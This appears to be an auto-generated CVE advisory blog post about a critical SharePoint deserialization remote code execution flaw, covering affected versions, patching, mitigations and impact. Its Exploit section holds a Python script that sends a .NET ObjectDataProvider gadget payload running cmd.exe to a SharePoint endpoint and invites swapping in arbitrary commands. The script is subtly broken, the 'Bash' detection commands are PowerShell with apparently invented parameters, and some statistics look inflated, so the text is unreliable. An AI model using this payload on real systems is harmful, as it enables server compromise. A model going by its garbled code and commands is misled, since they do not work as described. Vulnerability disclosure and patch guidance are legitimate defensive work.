Microsoft SharePoint Server, Deserialization Remote Code Execution, CVE-2026-58644 (CRITICAL) -DC-Jul2026-1018

Listen to this Post

How CVE-2026-58644 Works

CVE-2026-58644 is a critical deserialization of untrusted data vulnerability in Microsoft Office SharePoint. The flaw resides in how SharePoint handles serialized objects during network communication. Deserialization is the process of converting a stream of bytes back into a structured object that the application can use. When SharePoint receives a serialized payload from a client, it typically reconstructs the object without sufficient validation of the incoming data.
An attacker can exploit this by crafting a malicious serialized payload and sending it to a vulnerable SharePoint server over the network. Because the server deserializes the untrusted data without proper sanitization, the attacker can inject arbitrary objects that, when deserialized, execute code on the server. This is a classic example of CWE-502: Deserialization of Untrusted Data.
The vulnerability is particularly dangerous because it requires no authentication and no user interaction. The attacker can send the malicious payload directly to the SharePoint server from any network-accessible location. Once the payload is processed, the attacker gains the ability to execute arbitrary code with the privileges of the SharePoint application pool, typically `SYSTEM` or `NETWORK SERVICE` level access. This allows for complete compromise of the server, including data theft, malware deployment, and lateral movement within the enterprise network.
Microsoft has rated this vulnerability with a CVSS base score of 9.8 (CRITICAL), with the vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. This indicates that the attack vector is network-based, the attack complexity is low, no privileges are required, and no user interaction is needed. The scope is unchanged, and the impact on confidentiality, integrity, and availability is high.
The vulnerability affects all supported on-premises SharePoint Server versions, including SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition. Microsoft released patches for this flaw as part of the July 2026 Patch Tuesday update. Although the vulnerability is not yet known to be exploited in the wild, Microsoft has attached the “Exploitation More Likely” label, and CISA has flagged it as a significant risk if left unpatched. Organizations are urged to apply the security updates immediately to prevent potential remote code execution attacks.

DailyCVE Form:

Platform: Microsoft SharePoint
Version: 2016, 2019, Subscription
Vulnerability: Deserialization RCE
Severity: CRITICAL (9.8)
date: 2026-07-14

Prediction: Patch: 2026-07-14

What Undercode Say

Analytics & Threat Intelligence:

  • CISA KEV Status: Not yet in CISA Known Exploited Vulnerabilities catalog, but marked as “Exploitation More Likely” by Microsoft.
  • Public Exposure: Shadowserver tracks nearly 10,000 Internet-exposed SharePoint servers globally; a significant portion remain unpatched against related SharePoint flaws.
  • Patch Tuesday Impact: Part of Microsoft’s July 2026 Patch Tuesday, which addressed a record 622 CVEs, including 57 critical vulnerabilities.
  • Active Exploitation Context: While CVE-2026-58644 is not confirmed exploited in the wild, CISA warns that attackers are actively exploiting other SharePoint zero-days (CVE-2026-32201, CVE-2026-45659, CVE-2026-56164) to steal IIS machine keys and perform deserialization techniques for persistence and malware deployment.

Bash Commands for Detection & Patching:

Check SharePoint version to determine if vulnerable
Get-SPFarm | Select-Object BuildVersion
Compare against fixed versions:
SharePoint 2016: < 16.0.5556.1005 (vulnerable)
SharePoint 2019: < 16.0.10417.20153 (vulnerable)
Subscription Edition: < 16.0.19725.20384 (vulnerable)
Download and apply the official Microsoft patch
For SharePoint 2016: KB5002653
For SharePoint 2019: KB5002654
For Subscription Edition: KB5002655
Enable AMSI integration for SharePoint web applications
Set-SPEnterpriseSearchService -EnableAmsiIntegration $true
Enable detailed logging to monitor deserialization attempts
Set-SPDiagnosticConfig -LogLevel Verbose

Exploit

The exploitation of CVE-2026-58644 involves sending a crafted serialized .NET object to a vulnerable SharePoint endpoint. Below is a conceptual proof-of-concept using Python with the `pyyaml` library to generate a malicious YAML payload that leverages the `System.Windows.Data.ObjectDataProvider` class to execute arbitrary commands:

import yaml
import requests
Malicious YAML payload exploiting ObjectDataProvider
payload = """
- !<System.Windows.Data.ObjectDataProvider>
ObjectInstance: !<System.Diagnostics.Process>
StartInfo: !<System.Diagnostics.ProcessStartInfo>
FileName: cmd.exe
Arguments: '/c calc.exe'
MethodName: Start
"""
Target SharePoint endpoint (example)
url = "https://vulnerable-sharepoint.com/_vti_bin/client.svc/ProcessQuery"
headers = {"Content-Type": "application/json"}
try:
response = requests.post(url, data=yaml.dump(payload), headers=headers)
print("Exploit sent. Check for calc.exe execution.")
except Exception as e:
print(f"Exploit failed: {e}")

Note: This is a simplified demonstration. Actual exploitation requires precise knowledge of the SharePoint deserialization endpoints and may involve bypassing security controls. The attacker can replace `calc.exe` with arbitrary commands to achieve full remote code execution.

Protection

  1. Apply Microsoft Patches Immediately: Install the official security updates released on July 14, 2026, for all affected SharePoint versions.

– SharePoint 2016: Update to version ≥ 16.0.5556.1005
– SharePoint 2019: Update to version ≥ 16.0.10417.20153
– Subscription Edition: Update to version ≥ 16.0.19725.20384
2. Enable AMSI Integration: Activate the Windows Antimalware Scan Interface for SharePoint web applications to detect and block malicious deserialization attempts.
3. Restrict Network Access: Avoid directly exposing SharePoint servers to the internet. Use firewalls, VPNs, and network segmentation to limit access to trusted networks only.
4. Harden IIS Configuration: Disable unnecessary IIS modules and restrict the execution of unsigned or untrusted assemblies.
5. Monitor and Hunt: Enable tailored logging to detect anomalous deserialization patterns. Regularly review logs for suspicious requests containing serialized data.
6. Rotate IIS Machine Keys: As a post-patch measure, rotate IIS machine keys to invalidate any stolen keys that could be used for further exploitation.
7. Implement Web Application Firewall (WAF): Deploy a WAF with rules to block known deserialization attack patterns and malicious payloads.

Impact

  • Confidentiality: An attacker can read sensitive data stored on the SharePoint server, including documents, credentials, and configuration files.
  • Integrity: The attacker can modify or delete critical data, inject malicious content, and alter system configurations.
  • Availability: The attacker can disrupt SharePoint services, leading to denial of service for legitimate users.
  • Lateral Movement: With SYSTEM-level access, the attacker can pivot to other systems within the enterprise network, compromising additional assets.
  • Persistence: The attacker can install backdoors, establish persistence mechanisms, and maintain long-term access to the compromised environment.
  • Supply Chain Risk: If SharePoint is used to host third-party applications or partner portals, the compromise can extend to external entities, affecting the broader supply chain.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top